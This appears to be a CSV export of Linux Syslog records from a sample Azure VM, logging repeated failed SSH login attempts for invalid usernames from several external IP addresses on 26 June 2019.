+17805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:24:54,UbuntuDevEnv,2019-06-26 09:24:53,auth,UbuntuDevEnv,info,Invalid user postgres from 118.24.90.122 port 63580,70171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,118.24.90.1,63580,,
+17806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:24:54,UbuntuDevEnv,2019-06-26 09:24:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,70171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+17807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:24:54,UbuntuDevEnv,2019-06-26 09:24:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:24:56,UbuntuDevEnv,2019-06-26 09:24:56,auth,UbuntuDevEnv,info,Failed password for invalid user postgres from 118.24.90.122 port 63580 ssh2,70171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,118.24.90.1,63580,,
+17809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:24:57,UbuntuDevEnv,2019-06-26 09:24:56,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 63580:11: Bye Bye [preauth],70171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,63580,,
+17810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:24:57,UbuntuDevEnv,2019-06-26 09:24:56,auth,UbuntuDevEnv,info,Disconnected from invalid user postgres 118.24.90.122 port 63580 [preauth],70171,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,postgres,118.24.90.1,63580,,
+17811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:03,UbuntuDevEnv,2019-06-26 09:25:02,auth,UbuntuDevEnv,info,Invalid user peng from 176.31.43.255 port 35184,70217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peng,176.31.43.2,35184,,
+17812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:03,UbuntuDevEnv,2019-06-26 09:25:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,70217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:03,UbuntuDevEnv,2019-06-26 09:25:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:04,UbuntuDevEnv,2019-06-26 09:25:04,auth,UbuntuDevEnv,info,Failed password for invalid user peng from 176.31.43.255 port 35184 ssh2,70217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peng,176.31.43.2,35184,,
+17815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:04,UbuntuDevEnv,2019-06-26 09:25:04,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 35184:11: Bye Bye [preauth],70217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,35184,,
+17816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:04,UbuntuDevEnv,2019-06-26 09:25:04,auth,UbuntuDevEnv,info,Disconnected from invalid user peng 176.31.43.255 port 35184 [preauth],70217,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,peng,176.31.43.2,35184,,
+17817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:22,UbuntuDevEnv,2019-06-26 09:25:22,auth,UbuntuDevEnv,info,Invalid user soyinka from 115.159.216.187 port 53691,70285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soyinka,115.159.216.1,53691,,
+17818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:22,UbuntuDevEnv,2019-06-26 09:25:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,70285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+17819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:22,UbuntuDevEnv,2019-06-26 09:25:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:25,UbuntuDevEnv,2019-06-26 09:25:24,auth,UbuntuDevEnv,info,Failed password for invalid user soyinka from 115.159.216.187 port 53691 ssh2,70285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soyinka,115.159.216.1,53691,,
+17821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:25,UbuntuDevEnv,2019-06-26 09:25:24,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 53691:11: Bye Bye [preauth],70285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,53691,,
+17822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:25,UbuntuDevEnv,2019-06-26 09:25:24,auth,UbuntuDevEnv,info,Disconnected from invalid user soyinka 115.159.216.187 port 53691 [preauth],70285,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,soyinka,115.159.216.1,53691,,
+17823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:37,UbuntuDevEnv,2019-06-26 09:25:37,auth,UbuntuDevEnv,info,Invalid user whoopsie from 165.22.203.187 port 43408,70350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,whoopsie,165.22.203.1,43408,,
+17824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:37,UbuntuDevEnv,2019-06-26 09:25:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,70350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:37,UbuntuDevEnv,2019-06-26 09:25:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:39,UbuntuDevEnv,2019-06-26 09:25:38,auth,UbuntuDevEnv,info,Failed password for invalid user whoopsie from 165.22.203.187 port 43408 ssh2,70350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,whoopsie,165.22.203.1,43408,,
+17827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:39,UbuntuDevEnv,2019-06-26 09:25:38,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 43408:11: Bye Bye [preauth],70350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,43408,,
+17828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:39,UbuntuDevEnv,2019-06-26 09:25:38,auth,UbuntuDevEnv,info,Disconnected from invalid user whoopsie 165.22.203.187 port 43408 [preauth],70350,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,whoopsie,165.22.203.1,43408,,
+17829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:44,UbuntuDevEnv,2019-06-26 09:25:44,auth,UbuntuDevEnv,info,Invalid user fourier from 118.24.90.122 port 10197,70368,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fourier,118.24.90.1,10197,,
+17830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:44,UbuntuDevEnv,2019-06-26 09:25:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70368,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:44,UbuntuDevEnv,2019-06-26 09:25:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,70368,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+17832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:46,UbuntuDevEnv,2019-06-26 09:25:45,auth,UbuntuDevEnv,info,Failed password for invalid user fourier from 118.24.90.122 port 10197 ssh2,70368,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fourier,118.24.90.1,10197,,
+17833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:46,UbuntuDevEnv,2019-06-26 09:25:46,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 10197:11: Bye Bye [preauth],70368,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,10197,,
+17834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:46,UbuntuDevEnv,2019-06-26 09:25:46,auth,UbuntuDevEnv,info,Disconnected from invalid user fourier 118.24.90.122 port 10197 [preauth],70368,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fourier,118.24.90.1,10197,,
+17835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:55,UbuntuDevEnv,2019-06-26 09:25:55,auth,UbuntuDevEnv,info,Invalid user automne from 176.31.202.90 port 58330,70411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,automne,176.31.202.9,58330,,
+17836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:55,UbuntuDevEnv,2019-06-26 09:25:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,70411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+17837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:55,UbuntuDevEnv,2019-06-26 09:25:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:57,UbuntuDevEnv,2019-06-26 09:25:56,auth,UbuntuDevEnv,info,Failed password for invalid user automne from 176.31.202.90 port 58330 ssh2,70411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,automne,176.31.202.9,58330,,
+17839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:57,UbuntuDevEnv,2019-06-26 09:25:56,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 58330:11: Bye Bye [preauth],70411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,58330,,
+17840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:25:57,UbuntuDevEnv,2019-06-26 09:25:56,auth,UbuntuDevEnv,info,Disconnected from invalid user automne 176.31.202.90 port 58330 [preauth],70411,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,automne,176.31.202.9,58330,,
+17841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:20,UbuntuDevEnv,2019-06-26 09:26:20,auth,UbuntuDevEnv,info,Invalid user dante from 187.6.249.142 port 37526,70503,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dante,187.6.249.1,37526,,
+17842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:20,UbuntuDevEnv,2019-06-26 09:26:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,70503,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+17843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:20,UbuntuDevEnv,2019-06-26 09:26:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70503,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:22,UbuntuDevEnv,2019-06-26 09:26:22,auth,UbuntuDevEnv,info,Failed password for invalid user dante from 187.6.249.142 port 37526 ssh2,70503,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dante,187.6.249.1,37526,,
+17845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:22,UbuntuDevEnv,2019-06-26 09:26:22,auth,UbuntuDevEnv,info,Disconnected from invalid user dante 187.6.249.142 port 37526 [preauth],70503,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dante,187.6.249.1,37526,,
+17846,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:22,UbuntuDevEnv,2019-06-26 09:26:22,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 37526:11: Bye Bye [preauth],70503,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,37526,,
+17847,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:23,UbuntuDevEnv,2019-06-26 09:26:22,auth,UbuntuDevEnv,info,Invalid user Waschlappen from 176.31.43.255 port 43494,70518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Waschlappen,176.31.43.2,43494,,
+17848,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:23,UbuntuDevEnv,2019-06-26 09:26:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17849,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:23,UbuntuDevEnv,2019-06-26 09:26:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,70518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+17850,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:25,UbuntuDevEnv,2019-06-26 09:26:24,auth,UbuntuDevEnv,info,Failed password for invalid user Waschlappen from 176.31.43.255 port 43494 ssh2,70518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Waschlappen,176.31.43.2,43494,,
+17851,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:25,UbuntuDevEnv,2019-06-26 09:26:24,auth,UbuntuDevEnv,info,Disconnected from invalid user Waschlappen 176.31.43.255 port 43494 [preauth],70518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Waschlappen,176.31.43.2,43494,,
+17852,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:25,UbuntuDevEnv,2019-06-26 09:26:24,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 43494:11: Bye Bye [preauth],70518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,43494,,
+17853,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:38,UbuntuDevEnv,2019-06-26 09:26:37,auth,UbuntuDevEnv,info,Invalid user vnc from 118.24.90.122 port 21315,70546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vnc,118.24.90.1,21315,,
+17854,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:38,UbuntuDevEnv,2019-06-26 09:26:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17855,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:38,UbuntuDevEnv,2019-06-26 09:26:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,70546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+17856,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:39,UbuntuDevEnv,2019-06-26 09:26:39,auth,UbuntuDevEnv,info,Failed password for invalid user vnc from 118.24.90.122 port 21315 ssh2,70546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vnc,118.24.90.1,21315,,
+17857,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:40,UbuntuDevEnv,2019-06-26 09:26:39,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 21315:11: Bye Bye [preauth],70546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,21315,,
+17858,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:40,UbuntuDevEnv,2019-06-26 09:26:39,auth,UbuntuDevEnv,info,Disconnected from invalid user vnc 118.24.90.122 port 21315 [preauth],70546,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vnc,118.24.90.1,21315,,
+17859,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:59,UbuntuDevEnv,2019-06-26 09:26:58,auth,UbuntuDevEnv,info,Invalid user earthdrilling from 165.22.203.187 port 36806,70645,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,earthdrilling,165.22.203.1,36806,,
+17860,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:59,UbuntuDevEnv,2019-06-26 09:26:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,70645,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+17861,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:26:59,UbuntuDevEnv,2019-06-26 09:26:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,70645,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+17862,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:01,UbuntuDevEnv,2019-06-26 09:27:01,auth,UbuntuDevEnv,info,Failed password for invalid user earthdrilling from 165.22.203.187 port 36806 ssh2,70645,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,earthdrilling,165.22.203.1,36806,,
+17863,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:01,UbuntuDevEnv,2019-06-26 09:27:01,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 36806:11: Bye Bye [preauth],70645,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,36806,,
+17864,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:27:01,UbuntuDevEnv,2019-06-26 09:27:01,auth,UbuntuDevEnv,info,Disconnected from invalid user earthdrilling 165.22.203.187 port 36806 [preauth],70645,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,earthdrilling,165.22.203.1,36806,,
